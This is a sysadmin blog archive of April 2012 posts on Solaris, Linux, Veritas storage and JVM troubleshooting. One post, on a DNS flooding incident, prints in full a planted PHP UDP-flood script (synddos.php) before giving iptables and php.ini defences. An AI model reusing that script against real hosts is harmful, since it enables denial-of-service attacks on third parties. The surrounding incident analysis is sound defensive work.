Archive for April, 2012

how to start/stop the SUNWwbsvr (webservd) Sun webserver

April 28th, 2012

Here are the steps to start the Sun webserver:

cd /apps/SUNWwbsvr/<https-tag-of-your-hostname>

./start

Here are the steps to stop the Sun webserver:

cd /apps/SUNWwbsvr/<https-tag-of-your-hostname>

./stop

To check whether the start/stop/restart completed:

ps -ef | grep SUNWwbsvr
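
If you do this often, a tiny wrapper script saves typing; here's a minimal sketch (the https-`hostname` instance directory is an assumption, adjust it to your own tag):

#!/bin/sh
# restart the Sun webserver instance and confirm webservd came back
INSTANCE=/apps/SUNWwbsvr/https-`hostname`
cd $INSTANCE && ./stop
cd $INSTANCE && ./start
sleep 5
ps -ef | grep -v grep | grep webservd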

resolved – pca 403 forbidden server error on solaris

April 28th, 2012

Today, while patching a Solaris 5.9 host, the following error occurred after I entered my MOS (My Oracle Support) user/password:

122300 56 < 63 RS- 22 SunOS 5.9: Kernel Patch
Looking for 122300-63 (2/52)
Trying Oracle
Please enter My Oracle Support Account User: test@doxer.org
Please enter My Oracle Support Account Password:
Trying https://getupdates.oracle.com/ (zip) (1/1)
Failed (Error 403: Forbidden)
Failed (patch not found)

Then I went to http://support.oracle.com and searched for patch 122300-63. The patch info page said I'd need the "Vintage Solaris" download access privilege to download this patch, but obviously none of my CSIs had that privilege.

As this account issue might take some time to resolve, I chose the cluster patch (or, you may say, patchset) method to do the patching on Solaris 9. Here are the steps for cluster patching on Solaris 5.9 (a condensed command sketch follows the list):

  • 1. Download the latest cluster patch bundle that matches your host from http://wesunsolve.net/bundles
  • 2. Unzip the package and read the Recommended.README file that comes with it
  • 3. Ensure there's enough free space on / and /var (ideally >4GB)
  • 4. Now run ./install_patchset or ./install_cluster (you can add the -nosave parameter if free space on / or /var is limited, but then you will not be able to back out individual patches if the need arises)
  • 5. For more installation messages, refer to the installation logfile /var/sadm/install_data/<patchset-name>_log
  • 6. Reboot your machine so that all patches are applied to your host.
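
Here's the condensed command sketch (the bundle filename is an assumption, use the one you actually downloaded):

unzip 9_Recommended.zip && cd 9_Recommended
more Recommended.README
df -h / /var #confirm free space, ideally >4GB
./install_cluster #add -nosave only if space is really tight
less /var/sadm/install_data/<patchset-name>_log
init 6 #reboot to apply all patches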

NB:

If you have RAID 1 (mirror) on your Solaris system, you can patch the submirror first, then sync to the other half once the server boots up and runs well. You can refer to the following for more information:

http://www.doxer.org/solaris-patching-trick-%E2%80%93-first-patch-submirror-then-sync-between-mirrors/


linux failed to boot due to filesystem corruption

April 25th, 2012

We had a Linux system which failed to boot because of a corrupted filesystem.

  • 1. When we tried booting into single user mode, it prompted us to "enter root password and repair the FS". We knew the corrupted filesystem /apps/kua had caused the issue, but fsck /apps/kua failed.
  • 2. Next, we tried booting up without the corrupted /apps/kua (this seems to be a classic trick in RHCE). But after commenting out /apps/kua in /etc/fstab, we got a "read only" error on /. We tried mount -o rw,remount /, but it still didn't work.
  • 3. Finally we thought of the rescue CD. After booting from it and commenting out /apps/kua in /etc/fstab, the system finally booted up (it automatically updated the related SELinux policy). The only things left are to back up the contents under /apps/kua, create a new partition mounted on /apps/kua, and finally copy the contents back to the newly created partition.

PS:
Actually, this problem might have been resolved by mounting with an alternative superblock. More details can be found here:

http://www.cyberciti.biz/tips/mounting-with-an-alternative-superblock.html

http://www.cyberciti.biz/tips/surviving-a-linux-filesystem-failures.html
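
For completeness, here's a minimal sketch of the alternative-superblock approach (assuming an ext2/ext3 filesystem on /dev/sda3; substitute your own device):

dumpe2fs /dev/sda3 | grep -i superblock #list backup superblock locations
fsck -b 32768 /dev/sda3 #fsck using a backup superblock (32768 is typical for 4KB-block filesystems)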

Categories: Hardware, IT Architecture, Linux, Storage, Systems

about lazy umount -l

April 19th, 2012 No comments

If you're running NetBackup to back up data to tapes and you find that some NetBackup jobs hang, you may want to umount the filesystems NetBackup is using in order to release those jobs.

But a small note here:

umount -l (lazy unmount: detach the filesystem from the filesystem hierarchy now, and clean up all references to the filesystem as soon as it is not busy anymore) will not kill the NB job. umount -l is potentially dangerous and I would discourage its use unless it's clearly the only way forward; it's certainly not something we would want to put in a script.

Essentially it marks the filesystem as unmounted, blocking any new processes from accessing it, but all processes that already have handles open can still traverse directories, read and write files, etc. This means mounting the filesystem again in the same location will create a situation where:
a) data in the backup is not consistent (some data from the old BCV snapshot, some from the newer one);
b) metadata is corrupted (the FS will eventually be unmounted once the first NB process ends and this state written to the superblock; the next umount will likely fail to handle it).
Worst of all, this masks the issue instead of resolving it, so I agree that we should chase the NetBackup team for a proper resolution.
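
Rather than reaching for umount -l, a safer first step is usually to find which processes still hold the filesystem and deal with them directly; a quick sketch (the mount point /backup is an assumption):

fuser -vm /backup #show processes with open files on the filesystem
lsof +f -- /backup #same via lsof, treating the argument as a filesystem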

Categories: Hardware, Storage

mondo linux backup

April 17th, 2012

Backup Procedure

#1. Install mondo RPM packages and dependencies
#1.1 Install mkisofs and cdrecord from SpaceWalk
yum -y install mkisofs cdrecord
#1.2 Install mondo packages from RPMs
rpm -ivh afio-2.5-2.el5.rf.x86_64.rpm \
buffer-1.19-2.el5.rf.x86_64.rpm \
mindi-2.1.0-1.rhel5.x86_64.rpm \
mindi-busybox-1.18.5-1.rhel5.x86_64.rpm \
mondo-3.0.0-1.rhel5.x86_64.rpm

#2. Make mondo scratch, tmp & run directories
#2.1 Check if <mondo_fs> has 1.5GB available
df -h <mondo_fs> #e.g. if mondo is to run on /usr -> df -h /usr
#2.2 Make directories <mondo_fs>/mondo/tmp, <mondo_fs>/mondo/scratch, <mondo_fs>/mondo/run
mkdir -p <mondo_fs>/mondo/tmp <mondo_fs>/mondo/scratch <mondo_fs>/mondo/run

#3. Mount ISO repository
#3.1 Trigger automount of ISO repository or mount NFS
cd /share/BuildISOs/Redhat #or, mount amsnfs:/export/software/BuildISOs <mountpoint>

#4. Run mondoarchive
#4.1 mondoarchive -O [ options ] : backup your PC
mondoarchive -O -i -p `uname -n` -N -d /share/BuildISOs/Redhat/`uname -n`/iso \
-T <mondo_fs>/mondo/tmp -S <mondo_fs>/mondo/scratch -s 4480m \
> <mondo_fs>/mondo/run/mondo-`uname -n`.output 2>&1
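
#4.2 (optional) sanity-check that the ISO was actually written before patching - a sketch; the filename pattern is an assumption based on the -p prefix above
ls -lh /share/BuildISOs/Redhat/`uname -n`/iso
mount -o loop /share/BuildISOs/Redhat/`uname -n`/iso/`uname -n`-1.iso /mnt && ls /mnt && umount /mnt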

#5. Patch the OS

#6. Remove mondo packages and directories installed & created in 1 & 2.
#6.1 Remove mkisofs, cdrecord & mondo packages.
rpm -e mkisofs cdrecord afio buffer mindi mindi-busybox mondo

#6.2 Remove <mondo_fs> scratch, tmp & run directories.
rm -r <mondo_fs>/mondo/tmp <mondo_fs>/mondo/scratch <mondo_fs>/mondo/run

Mondo Backout Procedure

#7. Boot from mondo ISO
#7.1 Mount mondo ISO on ilo or VMWare console
#7.2 Reboot server and set CDROM first in boot order
#7.3 Select default boot options
#7.4 Exit mondorestore after completion

#8. Reboot
#8.1 Unmount ISO
#8.2 Reboot


Categories: IT Architecture, Linux, Systems

resolved – port 53 dns flooding attack

April 13th, 2012

I found this port 53 DNS flooding attack when the server became very unstable: the NIC was blipping and the network just went down without the OS rebooting.

Using ntop as a detector, I found that DNS traffic was at a very high level (about 3Gb of traffic). So I decided to block DNS traffic and allow only the usual ports.

  • Disable autoboot of iptables in case there's something wrong with iptables

mv /etc/rc3.d/S08iptables /etc/rc3.d/s08iptables

  • Here are the rules

[root@doxer ~]# cat iptables-stop-flood.sh

#!/bin/bash
iptables -F

#Note that DROP is different from REJECT. REJECT returns an error to the client (telnet reports "Connection refused"), while DROP silently drops the packet (telnet hangs at "Trying..." and eventually reports "Connection timed out").
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#todo - allow no more than 5 new connections per second
#iptables -A INPUT -p tcp --syn -m limit --limit 5/s -i eth0 -j ACCEPT

# Allow traffic already established to continue
iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p all -m state --state INVALID -j DROP

#Allow ftp, http, mysql
#todo - if there's no -m multiport, then --dport or --sport must be a single port or a range
#todo - with --ports, source and destination ports are assumed to be the same
iptables -A INPUT -p tcp -m multiport --dport 20,21,80,3306 -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --sport 20,21,80,3000,3306 -j ACCEPT

#Allow outgoing httpd like telnet doxer 80
iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

#Allow ntop
iptables -A INPUT -p udp -m multiport --dport 3000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dport 3000 -j ACCEPT

#Allow sftp
iptables -A INPUT -p tcp --dport 115 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 115 -j ACCEPT

#Allow outgoing ssh
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT

#allow rsync
iptables -A OUTPUT -p tcp --dport 873 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --dport 873 -j ACCEPT

#allow ftp passive mode(you need set vsftpd first)
iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 35000:37000 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 35000:37000 -j ACCEPT

#Allow ping & nslookup. echo-request is type 8, echo-reply is type 0
#allow other hosts to ping
iptables -A INPUT -p icmp --icmp-type 8 -m limit --limit 1/s -j ACCEPT
#iptables -A INPUT -p icmp --icmp-type 8 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 0 -j ACCEPT
#allow this host ping others
iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT

#allow dns query
#iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
#iptables -A INPUT -p udp --sport 53 -j ACCEPT
#iptables -A OUTPUT -p tcp --dport 53 -j ACCEPT
#iptables -A INPUT -p tcp --sport 53 -j ACCEPT

# Allow local loopback services
iptables -A INPUT -i lo -j ACCEPT

#save and restart iptables
/etc/init.d/iptables save
/etc/init.d/iptables restart

  • run the rules

chmod +x ./iptables-stop-flood.sh && ./iptables-stop-flood.sh

  • enable autoboot of iptables
If everything is ok, enable autoboot of iptables:
mv /etc/rc3.d/s08iptables /etc/rc3.d/S08iptables

After all these steps, DNS traffic dropped back to normal.
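
To verify, you can watch the rule counters and confirm DNS packets are no longer leaving the host; for example:

iptables -L -n -v | head -30 #packet/byte counters per rule
tcpdump -nni eth0 port 53 #should now show little to no DNS traffic leaving the host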

NB:

After several days of investigation, I finally found that this attack was sourced from some worms (PHP worms?) embedded in dedecms's directory. Here's one file, called synddos.php:

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_REQUEST['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Warning to: opening";
exit;
}

for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}

$max_time = time()+$exec_time;

while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

This is crazy! That explains why there was so much outbound DNS traffic!

To cure this weakness:

1. Disable the fsockopen function in php.ini:

disable_functions = fsockopen

2. In the .htaccess file, prevent PHP scripts from running in the writable directories:

RewriteEngine on
RewriteCond % !^$
RewriteRule uploads/(.*).(php)$ - [F]
RewriteRule data/(.*).(php)$ - [F]
RewriteRule templets/(.*).(php)$ - [F]
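
It's also worth hunting for other planted PHP backdoors under the same directories; a sketch (the web root path is an assumption):

grep -rlE 'fsockopen|ignore_user_abort' /var/www/html/uploads /var/www/html/data /var/www/html/templets
find /var/www/html -name '*.php' -mtime -30 -ls #recently dropped .php files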

solaris svm broken – need to boot from mirror disk

April 11th, 2012

If Solaris's SVM is broken, and the broken metadevice is the one for the root disk, the system will fail to boot. We can try booting from the mirror disk directly rather than through SVM. If the mirror is in good condition, your system will boot up, and once it's up we can repair the broken SVM.

Here are the steps to boot Solaris from the mirror disk without SVM:

1. Prepare a CD/DVD with your host's version of Solaris.

2. Go to the ok prompt.

3. ok> boot cdrom -s (or boot net -s)

4. Mount the root slice on /a.

5. Take a backup of the /a/etc/vfstab and /a/etc/system files.
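
For example (assuming the root slice is c0t0d0s0):

# mount /dev/dsk/c0t0d0s0 /a
# cp /a/etc/vfstab /a/etc/vfstab.bak
# cp /a/etc/system /a/etc/system.bak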

6. Modify the entries in the vfstab and system files under /a/etc, as described in the next two steps.

7.Edit the /a/etc/system file, and remove the "rootdev" line shown below:

# vi /a/etc/system
*rootdev:/pseudo/md@0:0,0,blk #yours may be different
------> Do not comment the line. Remove it.

8. In the /a/etc/vfstab file, replace the lines for the system filesystem metadevices with their underlying partitions.

For example, change lines from:

/dev/md/dsk/d0 /dev/md/rdsk/d0 / ufs 1 no -

to:

/dev/dsk/c0t0d0s0 /dev/rdsk/c0t0d0s0 / ufs 1 no -

ONLY change the lines for root (/) and the filesystems which were affected. All other metadevices may stay as-is in this file.

9. Unmount and check the root filesystem.

# cd /
# umount /a
# fsck /dev/rdsk/c0t0d0s0

10. # /usr/sbin/installboot /usr/platform/`uname -i`/lib/fs/ufs/bootblk /dev/rdsk/cXtXdXs0

[

If the CD/DVD or network image you booted from contains a more recent version of the Solaris OS than the one on the disk, then install the bootblk using the following command instead.

#/a/usr/sbin/installboot /a/usr/platform/`uname -i`/lib/fs/ufs/bootblk /dev/rdsk/cXtXdXs0

]

11. init 0

12. Boot from the mirror disk:
ok> boot disk0

PS:

You can find more info if you search for "Unable to boot from a DiskSuite-controlled system disk" on Google.

solaris kernel bug – ACK replied before SYN/ACK, valid outbound packets dropped

April 9th, 2012

If you are intermittently getting the error "ldapserver.test.com:389; socket closed.", some tcpdumping may turn up the following.

Analysing the network traffic, you may find this incorrect packet exchange chain:

testhost1 -- > testhost2 (SYN)
testhost1 < -- testhost2 (ACK) -- at this point a SYN/ACK packet should have been sent
testhost1 -- > testhost2 (RST) -- since it didn't receive a SYN/ACK, the client initiates a TCP reset

Actually this is a Solaris kernel bug. The workaround is to run:

ndd -set /dev/ip ip_ire_arp_interval 999999999

After this, packet drops fell to about one per week per host.

More info about this kernel bug can be found here http://wesunsolve.net/bugid/id/6942436
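
Note that ndd settings do not survive a reboot; to make the workaround persistent you could drop it into a startup script, e.g. (the script name is an assumption):

cat > /etc/rc2.d/S99ndd-workaround <<'EOF'
#!/sbin/sh
ndd -set /dev/ip ip_ire_arp_interval 999999999
EOF
chmod 744 /etc/rc2.d/S99ndd-workaround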

re-initialize veritas device layouts

April 6th, 2012

If you find inconsistent paths on your VxFS-based filesystems, you may consider re-initializing the Veritas device layouts, i.e. removing all rdmp and dmp entries from /etc/vx/dmp and /etc/vx/rdmp and recreating them later.

---Before starting the implementation, freeze the VCS cluster on each node

hasys -freeze testhost

---Kill the vxconfigd daemon #This step is generally not required on Solaris 10 with VxVM 5.0. Note the "-k" argument does not kill vxconfigd, it restarts it, hence the kill -9 below:

# kill -9 <pid of vxconfigd>

---Stop the eventsource daemon

# vxddladm stop eventsource

---Remove all rdmp and dmp entries from /etc/vx/dmp and /etc/vx/rdmp

---Move /etc/vx/array.info to something like /etc/vx/array.info.old

---Repeat the previous step for /etc/vx/jbod.info and /etc/vx/disk.info #optional

You may need to make changes at the underlying storage layer if part of your issue includes device path confusion at the OS level. Run cfgadm or devfsadm -C (on Solaris), or whatever is required, to get the OS's view of devices into the state you want. There are many things that can be done here which might seem extreme or risky, and they require a sound knowledge of device configuration too large to include in this post; that said, a decently current OS would not normally require a reboot to address such issues, though it may sometimes be more expedient to reboot anyway. An example follows.
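
For example, on Solaris that would typically be:

# devfsadm -Cv #clean up dangling /dev links
# cfgadm -al #list attachment points and confirm HBA/LUN state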

---Start vxconfigd if you had to kill it earlier

# vxconfigd -x syslog -m boot

Wait a minute for it to return, or just nohup it in the first place.

---Scan disks

#vxdisk scandisks

---Enable dmp

#vxdctl enable

---Once everything is verified against your test plan, unfreeze VCS

hasys -unfreeze testhost


vxfs extending filesystems using luns from EMC DMX3-24 array

April 6th, 2012

This article shows how to extend VxVM/VxFS filesystems using LUNs from an EMC DMX3-24 array (on HP-UX).

First, do the zoning and mapping on the SAN switches (that part is not covered in this article).

Now imagine you already have LUN 23AB allocated from the DMX array to this host; here are the steps to add it to the OS and extend the vxfs-based filesystem.

--Prepare work
ioscan -fknC disk > /var/tmp/ioscan_before
syminq -pdevfile > /var/tmp/syminq_before
vxdisk -o alldgs list > /var/tmp/alldgs_before
vxdisk -e list > /var/tmp/vxdisk_before
vxprint -Aht > /var/tmp/vxprint_before
bdf -l > /var/tmp/bdf_before

--Scan LUNs

# ioscan -fnC disk
# insf -e -C disk #force device creation; after this you will see the new LUN
#syminq -pdevfile | grep 23AB #the new LUN(s) should be visible to the host now

NOTE: The output of syminq -pdevfile|grep 23AB will look like the following if your OS has 2 paths:

000290101888 (Symmetrix ID, i.e. SID) /dev/rdsk/c50t4d5     23AB  8B 1

000290101888 (Symmetrix ID, i.e. SID) /dev/rdsk/c51t4d5     23AB  9C 0

# symcfg disco #This operation may take up to a few minutes. Please be patient
# sympd list | grep -i 23AB #the new LUN(s) should be visible to the host now

NOTE: The output of sympd list | grep -i 23AB will look like the following if your OS has 2 paths:

/dev/rdsk/c50t4d5      23AB 08B:1 12C:D2  RAID-5        N/Grp'd      RW   34560

/dev/rdsk/c51t4d5      23AB 09C:0 12C:D2  RAID-5        N/Grp'd      RW   34560

# vxdctl enable

NOTE: after this step, you'll see the DMP device for 23AB using syminq -pdevfile|grep 23AB:

000290101912 /dev/rdsk/c50t4d5 23AB 8B 1
000290101912 /dev/rdsk/c51t4d5 23AB 9C 0
000290101912 /dev/vx/rdmp/EMC1_68 23AB 8B 1

# vxdisk -e list
# symcfg disco

NOTE: after this step, you'll see the DMP device for 23AB using sympd list|grep 23AB:

#sympd list | grep -i 23AB

/dev/vx/rdmp/EMC1_68 23AB 08B:1 12C:D2 RAID-5 N/Grp'd RW 34560

/dev/rdsk/c50t4d5      23AB 08B:1 12C:D2  RAID-5        N/Grp'd      RW   34560

/dev/rdsk/c51t4d5      23AB 09C:0 12C:D2  RAID-5        N/Grp'd      RW   34560

--Add the new LUN to the disk group

# /etc/vx/bin/vxdisksetup -i EMC1_68

Note: before vxdisksetup, the disk will look like this:

# vxdisk list EMC1_68
Device: EMC1_68
devicetag: EMC1_68
type: auto
info: format=none
flags: online ready private autoconfig invalid
pubpaths: block=/dev/vx/dmp/EMC1_68 char=/dev/vx/rdmp/EMC1_68
Multipathing information:
numpaths: 2
c50t4d5 state=enabled
c51t4d5 state=enabled

And after vxdisksetup, the disk will look like this:

# vxdisk list EMC1_68
Device: EMC1_68
devicetag: EMC1_68
type: auto
hostid:
disk: name= id=1333677433.174.testhost
group: name= id=
info: format=cdsdisk,privoffset=128
flags: online ready private autoconfig autoimport
pubpaths: block=/dev/vx/dmp/EMC1_68 char=/dev/vx/rdmp/EMC1_68
version: 3.1
iosize: min=512 (bytes) max=1024 (blocks)
public: slice=0 offset=1152 len=35386368 disk_offset=0
private: slice=0 offset=128 len=1024 disk_offset=0
update: time=1333677433 seqno=0.1
ssb: actual_seqno=0.0
headers: 0 120
configs: count=1 len=640
logs: count=1 len=96
Defined regions:
config priv 000024-000119[000096]: copy=01 offset=000000 disabled
config priv 000128-000671[000544]: copy=01 offset=000096 disabled
log priv 000672-000767[000096]: copy=01 offset=000000 disabled
lockrgn priv 000768-000839[000072]: part=00 offset=000000
Multipathing information:
numpaths: 2
c50t4d5 state=enabled
c51t4d5 state=enabled

# vxdg -g DgNameOfYours adddisk emc23AB=23AB

--Extend the FS

vxassist -g DgNameOfYours maxgrow YourUnderLyingVolume #the output will be "Volume YourUnderLyingVolume  can be extended by X to: Y"

/etc/vx/bin/vxresize -g DgNameOfYours -F vxfs -bx YourUnderLyingVolume +<X>

After this step, both the underlying volume and the OS filesystem will have been extended (vxresize automatically grows both the volume and certain types of filesystems, vxfs included).
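
A worked example with hypothetical names and numbers:

# vxassist -g datadg maxgrow datavol
Volume datavol can be extended by 35383296 to: 70766592 (sectors)
# /etc/vx/bin/vxresize -g datadg -F vxfs -bx datavol +35383296
# bdf /data #HP-UX: confirm the filesystem grew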

threads high on JVM due to I/O bottleneck

April 6th, 2012

I/O always seems to be a bottleneck for applications, and sometimes moving from hard drive to a RAM disk is a good idea, since the latter is much more efficient than the former.

Let's analyse a stack trace of a blocked thread:


Thread "WebContainer : 1103": acquiring monitor java.util.HashSet owned by WebContainer : 1009 (0:00:03.769)
com.vgn.ext.templating.cache.BaseObjectCache.putVariation (BaseObjectCache.java:352, bci=121, server compiler)
blocked on java.util.HashSet (0x000000c9d5e606d0)
com.vgn.ext.templating.cache.BaseObjectCache.putRenderedManagedObject (BaseObjectCache.java:329, bci=36, server compiler)
com.foundation.dp.V7ObjectCache.putRenderedManagedObject (V7ObjectCache.java:372, bci=458, server compiler)
com.vgn.ext.templating.util.RenderUtil.renderContentItem (RenderUtil.java:249, bci=657, server compiler)
com.vgn.ext.templating.util.RenderUtil.renderRegionContent (RenderUtil.java:533, bci=79, server compiler)
com.vgn.ext.templating.taglib.ContentRegionTagSupport.renderRegion (ContentRegionTagSupport.java:626, bci=63, server compiler)
com.vgn.ext.templating.taglib.ContentRegionTagSupport.doStartTag (ContentRegionTagSupport.java:672, bci=180, server compiler)
com.ibm._jsp._contentRegion._jspService (_contentRegion.java:148, bci=561, server compiler)
com.ibm.ws.jsp.runtime.HttpJspBase.service (HttpJspBase.java:87, bci=3, server compiler)
javax.servlet.http.HttpServlet.service (HttpServlet.java:856, bci=30, server compiler)
com.ibm.ws.webcontainer.servlet.ServletWrapper.service (ServletWrapper.java:1146, bci=248, server compiler)
com.ibm.ws.webcontainer.servlet.ServletWrapper.handleRequest (ServletWrapper.java:592, bci=1071, server compiler)
com.ibm.ws.wswebcontainer.servlet.ServletWrapper.handleRequest (ServletWrapper.java:525, bci=510, server compiler)
com.ibm.wsspi.webcontainer.servlet.GenericServletWrapper.handleRequest (GenericServletWrapper.java:122, bci=6, server compiler)
com.ibm.ws.jsp.webcontainerext.AbstractJSPExtensionServletWrapper.handleRequest (AbstractJSPExtensionServletWrapper.java:232, bci=539, server compiler)
com.ibm.ws.webcontainer.webapp.WebAppRequestDispatcher.include (WebAppRequestDispatcher.java:639, bci=704, server compiler)
com.vgn.ext.templating.portal.taglib.VAPIncludeTag.doStartTag (VAPIncludeTag.java:147, bci=562, server compiler)
com.ibm._jsp._view._jspx_meth_page_include$1page_0 (_view.java:455, bci=41, server compiler)
com.ibm._jsp._view._jspService (_view.java:231, bci=1038, server compiler)

From this we can conclude that the thread is waiting to acquire the lock it needs before it can put a rendered object into the cache.

Here's a stack trace of the running active thread:

Thread "WebContainer : 947": running
java.io.FileOutputStream.writeBytes (native method)
java.io.FileOutputStream.write (FileOutputStream.java:278, bci=4, server compiler)
java.io.ObjectOutputStream$BlockDataOutputStream.drain (ObjectOutputStream.java:1690, bci=36, server compiler)
java.io.ObjectOutputStream$BlockDataOutputStream.setBlockDataMode (ObjectOutputStream.java:1599, bci=14, server compiler)
java.io.ObjectOutputStream.writeObject0 (ObjectOutputStream.java:1090, bci=540, server compiler)
java.io.ObjectOutputStream.writeObject (ObjectOutputStream.java:307, bci=16, server compiler)
java.util.HashSet.writeObject (HashSet.java:254, bci=66, server compiler)
sun.reflect.GeneratedMethodAccessor208.invoke (unknown source, bci=40, server compiler)
sun.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAccessorImpl.java:25, bci=6, server compiler)
java.lang.reflect.Method.invoke (Method.java:585, bci=111, server compiler)
java.io.ObjectStreamClass.invokeWriteObject (ObjectStreamClass.java:917, bci=20, server compiler)
java.io.ObjectOutputStream.writeSerialData (ObjectOutputStream.java:1344, bci=79, server compiler)
java.io.ObjectOutputStream.writeOrdinaryObject (ObjectOutputStream.java:1295, bci=64, server compiler)
java.io.ObjectOutputStream.writeObject0 (ObjectOutputStream.java:1084, bci=506, server compiler)
java.io.ObjectOutputStream.defaultWriteFields (ObjectOutputStream.java:1380, bci=115, server compiler)
java.io.ObjectOutputStream.writeSerialData (ObjectOutputStream.java:1352, bci=125, server compiler)
java.io.ObjectOutputStream.writeOrdinaryObject (ObjectOutputStream.java:1295, bci=64, server compiler)
java.io.ObjectOutputStream.writeObject0 (ObjectOutputStream.java:1084, bci=506, server compiler)
java.io.ObjectOutputStream.writeObject (ObjectOutputStream.java:307, bci=16, server compiler)
com.vgn.ext.templating.cache.DefaultObjectCache.addFile (DefaultObjectCache.java:356, bci=173, server compiler)
com.vgn.ext.templating.cache.DefaultObjectCache.putSimpleObject (DefaultObjectCache.java:1098, bci=91, server compiler)
com.foundation.dp.V7ObjectCache.putSimpleObject (V7ObjectCache.java:797, bci=36, server compiler)
com.vgn.ext.templating.cache.BaseObjectCache.putVariation (BaseObjectCache.java:366, bci=246, server compiler)
locked java.util.HashSet (0x000000c94019b9c8)
com.vgn.ext.templating.cache.BaseObjectCache.putRenderedManagedObject (BaseObjectCache.java:329, bci=36, server compiler)
com.foundation.dp.V7ObjectCache.putRenderedManagedObject (V7ObjectCache.java:372, bci=458, server compiler)
com.vgn.ext.templating.util.RenderUtil.renderContentItem (RenderUtil.java:249, bci=657, server compiler)
com.vgn.ext.templating.util.RenderUtil.renderRegionContent (RenderUtil.java:533, bci=79, server compiler)

We can conclude that the active threads are attempting disk I/O and getting stuck in the write() syscall for a considerable amount of time. So let's go to the host and check the I/O statistics:

root@doxer# iostat -xn
extended device statistics
r/s w/s kr/s kw/s wait actv wsvc_t asvc_t %w %b device
21.9 189.6 68.7 5433.3 1.0 1.6 4.9 7.4 9 47 testserver:/cache
9.0 421.7 229.3 13280.8 0.2 1.1 0.4 2.7 3 64 testserver:/cache
4.0 510.7 82.3 16310.0 0.5 1.5 0.9 2.9 7 62 testserver:/cache
14.1 692.6 190.3 21625.8 1.0 2.6 1.4 3.7 15 73 testserver:/cache
19.0 747.1 219.5 23096.4 1.7 3.5 2.2 4.6 22 74 testserver:/cache
1.0 392.0 25.9 12433.3 0.0 0.6 0.0 1.6 1 55 testserver:/cache
5.0 417.9 97.9 13284.8 0.1 0.9 0.2 2.1 2 58 testserver:/cache
7.0 425.9 186.5 13368.8 0.2 1.3 0.4 2.9 4 67 testserver:/cache
4.0 537.1 55.8 17002.2 1.0 1.7 1.9 3.1 10 65 testserver:/cache
11.0 911.0 110.6 28490.8 2.4 4.1 2.6 4.4 29 76 testserver:/cache
7.0 377.4 110.0 11897.0 0.0 1.0 0.0 2.5 1 63 testserver:/cache
3.0 597.9 28.9 18825.1 0.7 1.9 1.2 3.2 12 60 testserver:/cache
1.0 502.0 25.2 15639.9 0.3 1.3 0.6 2.6 7 55 testserver:/cache
1.0 495.0 22.5 15739.3 1.1 1.8 2.3 3.7 12 64 testserver:/cache
9.9 555.2 114.1 17626.5 0.9 2.2 1.6 3.9 12 67 testserver:/cache
21.1 747.8 61.4 22946.8 5.1 3.4 6.6 4.4 24 77 testserver:/cache
6.0 794.8 130.4 25325.1 2.1 3.7 2.7 4.7 27 69 testserver:/cache
8.0 646.6 53.6 20225.4 1.4 2.5 2.2 3.8 17 65 testserver:/cache
7.0 380.3 157.4 12112.6 0.0 0.9 0.0 2.4 1 64 testserver:/cache
10.0 398.9 127.1 12610.9 0.1 1.1 0.2 2.7 2 68 testserver:/cache
10.0 843.4 94.1 26200.1 1.9 3.7 2.2 4.3 26 74 testserver:/cache
6.0 464.0 31.6 14471.7 0.4 1.5 0.8 3.2 6 63 testserver:/cache
0.0 619.0 0.0 19693.2 1.1 2.2 1.8 3.5 14 60 testserver:/cache
6.0 641.0 136.3 19917.7 1.3 2.6 2.0 4.0 18 70 testserver:/cache

Pretty heavy, and with a clear pattern! No other disks had any writes at all, only the NFS share. Moving the cache from NFS to tmpfs would improve write speeds dramatically.
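
A minimal sketch of moving such a cache onto tmpfs (Solaris; the size and path are assumptions, and note tmpfs contents are lost at reboot, which is usually fine for a cache):

mount -F tmpfs -o size=2g swap /apps/cache
#or make it permanent via an /etc/vfstab entry:
#swap - /apps/cache tmpfs - yes size=2g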

PS:

Solaris' iostat utility has been extended to report I/O statistics on NFS mounted filesystems, in addition to its traditional reports on disk, tape I/O, terminal activity, and CPU utilization. The iostat utility helps you measure and monitor performance by providing disk and network I/O throughput, utilization, queue lengths and response time.

